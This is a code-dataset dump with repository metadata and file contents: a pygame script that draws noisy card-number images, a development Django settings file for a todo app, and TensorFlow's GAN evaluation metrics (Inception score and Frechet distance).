hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56d069f936f05834c7ec7bb88b2ed427f7707994
| 1,966
|
py
|
Python
|
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | 3
|
2018-06-07T07:15:00.000Z
|
2018-10-09T07:59:50.000Z
|
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | null | null | null |
action/demo5/d2.py
|
pearpai/TensorFlow-action
|
264099d933988532ed59eaf0f2ad495d40ede4d2
|
[
"Apache-2.0"
] | 4
|
2017-04-23T05:30:41.000Z
|
2018-09-27T07:13:37.000Z
|
# -*- coding: utf-8 -*-
import os
import StringIO
from PIL import Image, ImageFont, ImageDraw
import pygame
import random
def demo1():
pygame.init()
text = ' 6231 6260 3100 3992 '
bgcolor = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
card_no_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
im = Image.new("RGB", (400, 50), bgcolor)
# dr = ImageDraw.Draw(im)
# font = ImageFont.truetype(os.path.join("fonts", "simsun.ttc"), 18)
font = pygame.font.SysFont('Microsoft YaHei', 50)
# font = pygame.font.SysFont('Farrington-7B-Qiqi', 50)
# font = ImageFont.truetype("font/Farrington-7B-Qiqi.ttf", 50)
# dr.text((10, 5), text, font=font, fill="#000000")
rtext = font.render(text, True, card_no_color, bgcolor)
# pygame.image.save(rtext, "t.gif")
sio = StringIO.StringIO()
pygame.image.save(rtext, sio)
sio.seek(0)
line = Image.open(sio)
im.paste(line, (10, 10))
img_d = ImageDraw.Draw(im)
x_len, y_len = im.size
print im.size
for _ in range(15):
noise_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
img_d.line(((random.uniform(1, x_len), random.uniform(1, y_len)),
(random.uniform(1, x_len), random.uniform(1, y_len))), noise_color)
# im.show()
im.save("t.jpg")
def demo2():
# 打开图像
img = Image.open('t.jpg')
img_d = ImageDraw.Draw(img)
# 获取 图片的 x轴,y轴 像素
x_len, y_len = img.size
for _ in range(15):
noise_color = (int(random.uniform(0, 255)), int(random.uniform(0, 255)), int(random.uniform(0, 255)))
img_d.line(((random.uniform(1, x_len), random.uniform(1, y_len)),
(random.uniform(1, x_len), random.uniform(1, y_len))), noise_color)
# 保存图片
img.save('ii.jpg')
if __name__ == '__main__':
demo1()
# demo2()
| 29.343284
| 109
| 0.612411
|
abec88cffca7c67a8b98b846f296849862435bb6
| 3,663
|
py
|
Python
|
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | null | null | null |
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | null | null | null |
todotrains/settings.py
|
princeofnubia/todo-trains
|
d1440ba88e2a89436681f0d66b290b1d45f719d6
|
[
"BSD-2-Clause"
] | 4
|
2021-07-13T10:29:36.000Z
|
2021-07-27T15:55:47.000Z
|
"""
Django settings for todotrains project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jyx7a03dj838*f&081eci6u8bovb^0&ueh-yc67bh*mfh@r)c+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'todo.apps.TodoConfig',
'corsheaders',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOW_ALL_ORIGINS = True
ROOT_URLCONF = 'todotrains.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['page/templates','todo/templates','user/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todotrains.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
#'ENGINE': 'django.db.backends.mysql',
'ENGINE': 'django.db.backends.sqlite3',
'USER': 'root',
'PASSWORD':'',
'HOST': 'localhost',
'PORT': '3306',
'NAME': 'Exquistodo'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/asset/'
STATICFILES_DIRS=[
BASE_DIR /'page/asset'
]
STATIC_ROOT= BASE_DIR/"asset"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| 25.615385
| 91
| 0.69424
|
b17975811247aebc759bc4b16e5ad703df4bb1b9
| 27,933
|
py
|
Python
|
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
deltheil/tensorflow
|
48178e04e3ef764cda5c9746637e978b080fabf2
|
[
"Apache-2.0"
] | 13
|
2018-07-23T18:53:35.000Z
|
2021-11-18T19:56:45.000Z
|
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
QinganZhao/tensorflow
|
6f0dd0425c51360fe2be5a938a8f3fb39e420fa3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/gan/python/eval/python/classifier_metrics_impl.py
|
QinganZhao/tensorflow
|
6f0dd0425c51360fe2be5a938a8f3fb39e420fa3
|
[
"Apache-2.0"
] | 13
|
2018-09-07T13:28:38.000Z
|
2020-07-17T15:06:24.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model evaluation tools for TFGAN.
These methods come from https://arxiv.org/abs/1606.03498 and
https://arxiv.org/abs/1706.08500.
NOTE: This implementation uses the same weights as in
https://github.com/openai/improved-gan/blob/master/inception_score/model.py,
but is more numerically stable and is an unbiased estimator of the true
Inception score even when splitting the inputs into batches.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import sys
import tarfile
from six.moves import urllib
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
__all__ = [
'get_graph_def_from_disk',
'get_graph_def_from_resource',
'get_graph_def_from_url_tarball',
'preprocess_image',
'run_image_classifier',
'run_inception',
'inception_score',
'classifier_score',
'classifier_score_from_logits',
'frechet_inception_distance',
'frechet_classifier_distance',
'frechet_classifier_distance_from_activations',
'mean_only_frechet_classifier_distance_from_activations',
'diagonal_only_frechet_classifier_distance_from_activations',
'INCEPTION_DEFAULT_IMAGE_SIZE',
]
INCEPTION_URL = 'http://download.tensorflow.org/models/frozen_inception_v1_2015_12_05.tar.gz'
INCEPTION_FROZEN_GRAPH = 'inceptionv1_for_inception_score.pb'
INCEPTION_INPUT = 'Mul:0'
INCEPTION_OUTPUT = 'logits:0'
INCEPTION_FINAL_POOL = 'pool_3:0'
INCEPTION_DEFAULT_IMAGE_SIZE = 299
def _validate_images(images, image_size):
images = ops.convert_to_tensor(images)
images.shape.with_rank(4)
images.shape.assert_is_compatible_with([None, image_size, image_size, None])
return images
def _symmetric_matrix_square_root(mat, eps=1e-10):
"""Compute square root of a symmetric matrix.
Note that this is different from an elementwise square root. We want to
compute M' where M' = sqrt(mat) such that M' * M' = mat.
Also note that this method **only** works for symmetric matrices.
Args:
mat: Matrix to take the square root of.
eps: Small epsilon such that any element less than eps will not be square
rooted to guard against numerical instability.
Returns:
Matrix square root of mat.
"""
# Unlike numpy, tensorflow's return order is (s, u, v)
s, u, v = linalg_ops.svd(mat)
# sqrt is unstable around 0, just use 0 in such case
si = array_ops.where(math_ops.less(s, eps), s, math_ops.sqrt(s))
# Note that the v returned by Tensorflow is v = V
# (when referencing the equation A = U S V^T)
# This is unlike Numpy which returns v = V^T
return math_ops.matmul(
math_ops.matmul(u, array_ops.diag(si)), v, transpose_b=True)
def preprocess_image(images,
height=INCEPTION_DEFAULT_IMAGE_SIZE,
width=INCEPTION_DEFAULT_IMAGE_SIZE,
scope=None):
"""Prepare a batch of images for evaluation.
This is the preprocessing portion of the graph from
http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz.
Note that it expects Tensors in [0, 255]. This function maps pixel values to
[-1, 1] and resizes to match the InceptionV1 network.
Args:
images: 3-D or 4-D Tensor of images. Values are in [0, 255].
height: Integer. Height of resized output image.
width: Integer. Width of resized output image.
scope: Optional scope for name_scope.
Returns:
3-D or 4-D float Tensor of prepared image(s). Values are in [-1, 1].
"""
is_single = images.shape.ndims == 3
with ops.name_scope(scope, 'preprocess', [images, height, width]):
if not images.dtype.is_floating:
images = math_ops.to_float(images)
if is_single:
images = array_ops.expand_dims(images, axis=0)
resized = image_ops.resize_bilinear(images, [height, width])
resized = (resized - 128.0) / 128.0
if is_single:
resized = array_ops.squeeze(resized, axis=0)
return resized
def _kl_divergence(p, p_logits, q):
"""Computes the Kullback-Liebler divergence between p and q.
This function uses p's logits in some places to improve numerical stability.
Specifically:
KL(p || q) = sum[ p * log(p / q) ]
= sum[ p * ( log(p) - log(q) ) ]
= sum[ p * ( log_softmax(p_logits) - log(q) ) ]
Args:
p: A 2-D floating-point Tensor p_ij, where `i` corresponds to the minibatch
example and `j` corresponds to the probability of being in class `j`.
p_logits: A 2-D floating-point Tensor corresponding to logits for `p`.
q: A 1-D floating-point Tensor, where q_j corresponds to the probability
of class `j`.
Returns:
KL divergence between two distributions. Output dimension is 1D, one entry
per distribution in `p`.
Raises:
ValueError: If any of the inputs aren't floating-point.
ValueError: If p or p_logits aren't 2D.
ValueError: If q isn't 1D.
"""
for tensor in [p, p_logits, q]:
if not tensor.dtype.is_floating:
raise ValueError('Input %s must be floating type.', tensor.name)
p.shape.assert_has_rank(2)
p_logits.shape.assert_has_rank(2)
q.shape.assert_has_rank(1)
return math_ops.reduce_sum(
p * (nn_ops.log_softmax(p_logits) - math_ops.log(q)), axis=1)
def get_graph_def_from_disk(filename):
"""Get a GraphDef proto from a disk location."""
with gfile.FastGFile(filename, 'rb') as f:
return graph_pb2.GraphDef.FromString(f.read())
def get_graph_def_from_resource(filename):
"""Get a GraphDef proto from within a .par file."""
return graph_pb2.GraphDef.FromString(resource_loader.load_resource(filename))
def get_graph_def_from_url_tarball(url, filename, tar_filename=None):
"""Get a GraphDef proto from a tarball on the web.
Args:
url: Web address of tarball
filename: Filename of graph definition within tarball
tar_filename: Temporary download filename (None = always download)
Returns:
A GraphDef loaded from a file in the downloaded tarball.
"""
if not (tar_filename and os.path.exists(tar_filename)):
def _progress(count, block_size, total_size):
sys.stdout.write('\r>> Downloading %s %.1f%%' %
(url,
float(count * block_size) / float(total_size) * 100.0))
sys.stdout.flush()
tar_filename, _ = urllib.request.urlretrieve(url, tar_filename, _progress)
with tarfile.open(tar_filename, 'r:gz') as tar:
proto_str = tar.extractfile(filename).read()
return graph_pb2.GraphDef.FromString(proto_str)
def _default_graph_def_fn():
return get_graph_def_from_url_tarball(INCEPTION_URL, INCEPTION_FROZEN_GRAPH,
os.path.basename(INCEPTION_URL))
def run_inception(images,
graph_def=None,
default_graph_def_fn=_default_graph_def_fn,
image_size=INCEPTION_DEFAULT_IMAGE_SIZE,
input_tensor=INCEPTION_INPUT,
output_tensor=INCEPTION_OUTPUT):
"""Run images through a pretrained Inception classifier.
Args:
images: Input tensors. Must be [batch, height, width, channels]. Input shape
and values must be in [-1, 1], which can be achieved using
`preprocess_image`.
graph_def: A GraphDef proto of a pretrained Inception graph. If `None`,
call `default_graph_def_fn` to get GraphDef.
default_graph_def_fn: A function that returns a GraphDef. Used if
`graph_def` is `None. By default, returns a pretrained InceptionV3 graph.
image_size: Required image width and height. See unit tests for the default
values.
input_tensor: Name of input Tensor.
output_tensor: Name or list of output Tensors. This function will compute
activations at the specified layer. Examples include INCEPTION_V3_OUTPUT
and INCEPTION_V3_FINAL_POOL which would result in this function computing
the final logits or the penultimate pooling layer.
Returns:
Tensor or Tensors corresponding to computed `output_tensor`.
Raises:
ValueError: If images are not the correct size.
ValueError: If neither `graph_def` nor `default_graph_def_fn` are provided.
"""
images = _validate_images(images, image_size)
if graph_def is None:
if default_graph_def_fn is None:
raise ValueError('If `graph_def` is `None`, must provide '
'`default_graph_def_fn`.')
graph_def = default_graph_def_fn()
activations = run_image_classifier(images, graph_def, input_tensor,
output_tensor)
if isinstance(activations, list):
for i, activation in enumerate(activations):
if array_ops.rank(activation) != 2:
activations[i] = layers.flatten(activation)
else:
if array_ops.rank(activations) != 2:
activations = layers.flatten(activations)
return activations
def run_image_classifier(tensor,
graph_def,
input_tensor,
output_tensor,
scope='RunClassifier'):
"""Runs a network from a frozen graph.
Args:
tensor: An Input tensor.
graph_def: A GraphDef proto.
input_tensor: Name of input tensor in graph def.
output_tensor: A tensor name or list of tensor names in graph def.
scope: Name scope for classifier.
Returns:
Classifier output if `output_tensor` is a string, or a list of outputs if
`output_tensor` is a list.
Raises:
ValueError: If `input_tensor` or `output_tensor` aren't in the graph_def.
"""
input_map = {input_tensor: tensor}
is_singleton = isinstance(output_tensor, str)
if is_singleton:
output_tensor = [output_tensor]
classifier_outputs = importer.import_graph_def(
graph_def, input_map, output_tensor, name=scope)
if is_singleton:
classifier_outputs = classifier_outputs[0]
return classifier_outputs
def classifier_score(images, classifier_fn, num_batches=1):
"""Classifier score for evaluating a conditional generative model.
This is based on the Inception Score, but for an arbitrary classifier.
This technique is described in detail in https://arxiv.org/abs/1606.03498. In
summary, this function calculates
exp( E[ KL(p(y|x) || p(y)) ] )
which captures how different the network's classification prediction is from
the prior distribution over classes.
NOTE: This function consumes images, computes their logits, and then
computes the classifier score. If you would like to precompute many logits for
large batches, use classifier_score_from_logits(), which this method also
uses.
Args:
images: Images to calculate the classifier score for.
classifier_fn: A function that takes images and produces logits based on a
classifier.
num_batches: Number of batches to split `generated_images` in to in order to
efficiently run them through the classifier network.
Returns:
The classifier score. A floating-point scalar of the same type as the output
of `classifier_fn`.
"""
generated_images_list = array_ops.split(
images, num_or_size_splits=num_batches)
# Compute the classifier splits using the memory-efficient `map_fn`.
logits = functional_ops.map_fn(
fn=classifier_fn,
elems=array_ops.stack(generated_images_list),
parallel_iterations=1,
back_prop=False,
swap_memory=True,
name='RunClassifier')
logits = array_ops.concat(array_ops.unstack(logits), 0)
return classifier_score_from_logits(logits)
def classifier_score_from_logits(logits):
"""Classifier score for evaluating a generative model from logits.
This method computes the classifier score for a set of logits. This can be
used independently of the classifier_score() method, especially in the case
of using large batches during evaluation where we would like precompute all
of the logits before computing the classifier score.
This technique is described in detail in https://arxiv.org/abs/1606.03498. In
summary, this function calculates:
exp( E[ KL(p(y|x) || p(y)) ] )
which captures how different the network's classification prediction is from
the prior distribution over classes.
Args:
logits: Precomputed 2D tensor of logits that will be used to
compute the classifier score.
Returns:
The classifier score. A floating-point scalar of the same type as the output
of `logits`.
"""
logits.shape.assert_has_rank(2)
# Use maximum precision for best results.
logits_dtype = logits.dtype
if logits_dtype != dtypes.float64:
logits = math_ops.to_double(logits)
p = nn_ops.softmax(logits)
q = math_ops.reduce_mean(p, axis=0)
kl = _kl_divergence(p, logits, q)
kl.shape.assert_has_rank(1)
log_score = math_ops.reduce_mean(kl)
final_score = math_ops.exp(log_score)
if logits_dtype != dtypes.float64:
final_score = math_ops.cast(final_score, logits_dtype)
return final_score
inception_score = functools.partial(
classifier_score,
classifier_fn=functools.partial(
run_inception, output_tensor=INCEPTION_OUTPUT))
def trace_sqrt_product(sigma, sigma_v):
"""Find the trace of the positive sqrt of product of covariance matrices.
'_symmetric_matrix_square_root' only works for symmetric matrices, so we
cannot just take _symmetric_matrix_square_root(sigma * sigma_v).
('sigma' and 'sigma_v' are symmetric, but their product is not necessarily).
Let sigma = A A so A = sqrt(sigma), and sigma_v = B B.
We want to find trace(sqrt(sigma sigma_v)) = trace(sqrt(A A B B))
Note the following properties:
(i) forall M1, M2: eigenvalues(M1 M2) = eigenvalues(M2 M1)
=> eigenvalues(A A B B) = eigenvalues (A B B A)
(ii) if M1 = sqrt(M2), then eigenvalues(M1) = sqrt(eigenvalues(M2))
=> eigenvalues(sqrt(sigma sigma_v)) = sqrt(eigenvalues(A B B A))
(iii) forall M: trace(M) = sum(eigenvalues(M))
=> trace(sqrt(sigma sigma_v)) = sum(eigenvalues(sqrt(sigma sigma_v)))
= sum(sqrt(eigenvalues(A B B A)))
= sum(eigenvalues(sqrt(A B B A)))
= trace(sqrt(A B B A))
= trace(sqrt(A sigma_v A))
A = sqrt(sigma). Both sigma and A sigma_v A are symmetric, so we **can**
use the _symmetric_matrix_square_root function to find the roots of these
matrices.
Args:
sigma: a square, symmetric, real, positive semi-definite covariance matrix
sigma_v: same as sigma
Returns:
The trace of the positive square root of sigma*sigma_v
"""
# Note sqrt_sigma is called "A" in the proof above
sqrt_sigma = _symmetric_matrix_square_root(sigma)
# This is sqrt(A sigma_v A) above
sqrt_a_sigmav_a = math_ops.matmul(sqrt_sigma,
math_ops.matmul(sigma_v, sqrt_sigma))
return math_ops.trace(_symmetric_matrix_square_root(sqrt_a_sigmav_a))
def frechet_classifier_distance(real_images,
generated_images,
classifier_fn,
num_batches=1):
"""Classifier distance for evaluating a generative model.
This is based on the Frechet Inception distance, but for an arbitrary
classifier.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distribution with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2 + Tr(C + C_w - 2(C * C_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute Frechet classifier distance when comparing two
generative models.
NOTE: This function consumes images, computes their activations, and then
computes the classifier score. If you would like to precompute many
activations for real and generated images for large batches, please use
frechet_clasifier_distance_from_activations(), which this method also uses.
Args:
real_images: Real images to use to compute Frechet Inception distance.
generated_images: Generated images to use to compute Frechet Inception
distance.
classifier_fn: A function that takes images and produces activations
based on a classifier.
num_batches: Number of batches to split images in to in order to
efficiently run them through the classifier network.
Returns:
The Frechet Inception distance. A floating-point scalar of the same type
as the output of `classifier_fn`.
"""
real_images_list = array_ops.split(
real_images, num_or_size_splits=num_batches)
generated_images_list = array_ops.split(
generated_images, num_or_size_splits=num_batches)
imgs = array_ops.stack(real_images_list + generated_images_list)
# Compute the activations using the memory-efficient `map_fn`.
activations = functional_ops.map_fn(
fn=classifier_fn,
elems=imgs,
parallel_iterations=1,
back_prop=False,
swap_memory=True,
name='RunClassifier')
# Split the activations by the real and generated images.
real_a, gen_a = array_ops.split(activations, [num_batches, num_batches], 0)
# Ensure the activations have the right shapes.
real_a = array_ops.concat(array_ops.unstack(real_a), 0)
gen_a = array_ops.concat(array_ops.unstack(gen_a), 0)
return frechet_classifier_distance_from_activations(real_a, gen_a)
def mean_only_frechet_classifier_distance_from_activations(
real_activations, generated_activations):
"""Classifier distance for evaluating a generative model from activations.
Given two Gaussian distribution with means m and m_w and covariance matrices
C and C_w, this function calcuates
|m - m_w|^2
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
In this variant, we only compute the difference between the means of the
fitted Gaussians. The computation leads to O(n) vs. O(n^2) memory usage, yet
still retains much of the same information as FID.
Args:
real_activations: 2D array of activations of real images of size
[num_images, num_dims] to use to compute Frechet Inception distance.
generated_activations: 2D array of activations of generated images of size
[num_images, num_dims] to use to compute Frechet Inception distance.
Returns:
The mean-only Frechet Inception distance. A floating-point scalar of the
same type as the output of the activations.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute means of activations.
m = math_ops.reduce_mean(real_activations, 0)
m_w = math_ops.reduce_mean(generated_activations, 0)
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
mofid = mean
if activations_dtype != dtypes.float64:
mofid = math_ops.cast(mofid, activations_dtype)
return mofid
def diagonal_only_frechet_classifier_distance_from_activations(
real_activations, generated_activations):
"""Classifier distance for evaluating a generative model.
This is based on the Frechet Inception distance, but for an arbitrary
classifier.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distribution with means m and m_w and covariance matrices
C and C_w, this function calcuates
|m - m_w|^2 + (sigma + sigma_w - 2(sigma x sigma_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images. In this variant, we compute diagonal-only covariance matrices.
As a result, instead of computing an expensive matrix square root, we can do
something much simpler, and has O(n) vs O(n^2) space complexity.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
Args:
real_activations: Real images to use to compute Frechet Inception distance.
generated_activations: Generated images to use to compute Frechet Inception
distance.
Returns:
The diagonal-only Frechet Inception distance. A floating-point scalar of
the same type as the output of the activations.
Raises:
ValueError: If the shape of the variance and mean vectors are not equal.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute mean and covariance matrices of activations.
m, var = nn_impl.moments(real_activations, axes=[0])
m_w, var_w = nn_impl.moments(generated_activations, axes=[0])
actual_shape = var.get_shape()
expected_shape = m.get_shape()
if actual_shape != expected_shape:
raise ValueError('shape: {} must match expected shape: {}'.format(
actual_shape, expected_shape))
# Compute the two components of FID.
# First the covariance component.
# Here, note that trace(A + B) = trace(A) + trace(B)
trace = math_ops.reduce_sum(
(var + var_w) - 2.0 * math_ops.sqrt(math_ops.multiply(var, var_w)))
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
dofid = trace + mean
if activations_dtype != dtypes.float64:
dofid = math_ops.cast(dofid, activations_dtype)
return dofid
def frechet_classifier_distance_from_activations(real_activations,
generated_activations):
"""Classifier distance for evaluating a generative model.
This methods computes the Frechet classifier distance from activations of
real images and generated images. This can be used independently of the
frechet_classifier_distance() method, especially in the case of using large
batches during evaluation where we would like precompute all of the
activations before computing the classifier distance.
This technique is described in detail in https://arxiv.org/abs/1706.08500.
Given two Gaussian distribution with means m and m_w and covariance matrices
C and C_w, this function calculates
|m - m_w|^2 + Tr(C + C_w - 2(C * C_w)^(1/2))
which captures how different the distributions of real images and generated
images (or more accurately, their visual features) are. Note that unlike the
Inception score, this is a true distance and utilizes information about real
world images.
Note that when computed using sample means and sample covariance matrices,
Frechet distance is biased. It is more biased for small sample sizes. (e.g.
even if the two distributions are the same, for a small sample size, the
expected Frechet distance is large). It is important to use the same
sample size to compute frechet classifier distance when comparing two
generative models.
Args:
real_activations: 2D Tensor containing activations of real data. Shape is
[batch_size, activation_size].
generated_activations: 2D Tensor containing activations of generated data.
Shape is [batch_size, activation_size].
Returns:
The Frechet Inception distance. A floating-point scalar of the same type
as the output of the activations.
"""
real_activations.shape.assert_has_rank(2)
generated_activations.shape.assert_has_rank(2)
activations_dtype = real_activations.dtype
if activations_dtype != dtypes.float64:
real_activations = math_ops.to_double(real_activations)
generated_activations = math_ops.to_double(generated_activations)
# Compute mean and covariance matrices of activations.
m = math_ops.reduce_mean(real_activations, 0)
m_w = math_ops.reduce_mean(generated_activations, 0)
num_examples = math_ops.to_double(array_ops.shape(real_activations)[0])
# sigma = (1 / (n - 1)) * (X - mu) (X - mu)^T
real_centered = real_activations - m
sigma = math_ops.matmul(
real_centered, real_centered, transpose_a=True) / (
num_examples - 1)
gen_centered = generated_activations - m_w
sigma_w = math_ops.matmul(
gen_centered, gen_centered, transpose_a=True) / (
num_examples - 1)
# Find the Tr(sqrt(sigma sigma_w)) component of FID
sqrt_trace_component = trace_sqrt_product(sigma, sigma_w)
# Compute the two components of FID.
# First the covariance component.
# Here, note that trace(A + B) = trace(A) + trace(B)
trace = math_ops.trace(sigma + sigma_w) - 2.0 * sqrt_trace_component
# Next the distance between means.
mean = math_ops.square(linalg_ops.norm(m - m_w)) # This uses the L2 norm.
fid = trace + mean
if activations_dtype != dtypes.float64:
fid = math_ops.cast(fid, activations_dtype)
return fid
frechet_inception_distance = functools.partial(
frechet_classifier_distance,
classifier_fn=functools.partial(
run_inception, output_tensor=INCEPTION_FINAL_POOL))
| 38.159836
| 93
| 0.728135
|
57967cd1109928af716f0b20ac04e7dc7c0ca248
| 624
|
py
|
Python
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 1
|
2022-01-10T07:41:17.000Z
|
2022-01-10T07:41:17.000Z
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 61
|
2021-01-30T08:05:55.000Z
|
2022-03-26T07:06:15.000Z
|
python/ray/experimental/workflow/tests/test_dynamic_workflow_ref.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 1
|
2021-11-20T14:19:48.000Z
|
2021-11-20T14:19:48.000Z
|
